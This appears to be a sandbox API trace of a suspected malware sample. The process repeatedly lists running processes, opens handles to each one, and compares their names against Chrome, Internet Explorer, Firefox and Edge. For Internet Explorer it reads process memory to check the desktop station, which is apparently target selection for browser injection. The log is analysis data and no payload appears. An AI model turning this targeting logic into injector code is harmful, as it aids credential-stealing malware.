	[0205.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.125] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0205.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.128] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.129] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0205.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.130] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.131] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0205.132] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x2b38
	[0205.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.132] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0205.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.132] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.133] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0205.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.133] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.134] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0205.134] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x2b3c
	[0205.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.134] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0205.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.135] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0205.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.135] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0205.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.135] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.135] NtQueryInformationProcess (in: ProcessHandle=0x2b3c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0205.136] ReadProcessMemory (in: hProcess=0x2b3c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0205.136] ReadProcessMemory (in: hProcess=0x2b3c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0205.136] ReadProcessMemory (in: hProcess=0x2b3c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0205.136] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0205.136] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0205.137] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x2b40
	[0205.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.137] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0205.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.137] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0205.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.137] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0205.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.138] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.138] NtQueryInformationProcess (in: ProcessHandle=0x2b40, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0205.138] ReadProcessMemory (in: hProcess=0x2b40, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0205.138] ReadProcessMemory (in: hProcess=0x2b40, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0205.138] ReadProcessMemory (in: hProcess=0x2b40, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0205.138] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0205.138] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0205.139] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x2b44
	[0205.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.139] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0205.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.139] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.140] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0205.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.140] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.140] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0205.141] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x2b48
	[0205.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.142] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0205.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.142] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.142] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0205.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.143] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.143] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.144] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x2b4c
	[0205.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.144] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.144] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.144] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.145] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.145] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.145] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.146] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x2b50
	[0205.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.146] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.147] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.147] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.147] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.147] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0205.148] CloseHandle (hObject=0x188) returned 1
	[0205.148] Sleep (dwMilliseconds=0x64) 
	[0205.250] GetCurrentProcessId () returned 0x110
	[0205.250] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0205.252] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0205.253] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0205.254] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0205.254] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x2b54
	[0205.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.254] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0205.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.255] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.255] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0205.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.255] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.255] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0205.256] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x2b58
	[0205.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.256] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0205.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.256] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.257] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0205.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.257] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.257] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0205.258] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x2b5c
	[0205.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.258] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0205.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.258] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.259] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0205.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.259] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.259] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0205.260] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x2b60
	[0205.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.260] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0205.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.260] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.261] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0205.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.261] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.261] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0205.262] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2b64
	[0205.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.262] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0205.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.262] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.262] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0205.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.263] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.263] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0205.264] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x2b68
	[0205.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.264] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0205.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.264] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.264] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0205.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.265] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.265] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0205.266] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2b6c
	[0205.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.266] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0205.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.266] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.266] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0205.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.267] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.267] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0205.268] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2b70
	[0205.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.268] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0205.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.268] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.268] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0205.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.268] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.269] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.269] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2b74
	[0205.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.269] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.270] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.270] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.270] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.271] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.271] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x2b78
	[0205.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.271] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.272] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.272] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.272] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.273] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.273] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2b7c
	[0205.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.273] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.274] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.274] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.274] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.274] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.275] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x2b80
	[0205.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.275] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.276] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.276] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.276] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.276] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.277] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x2b84
	[0205.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.277] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.278] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.278] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.278] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.278] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.279] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x2b88
	[0205.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.279] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.279] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.280] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.280] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
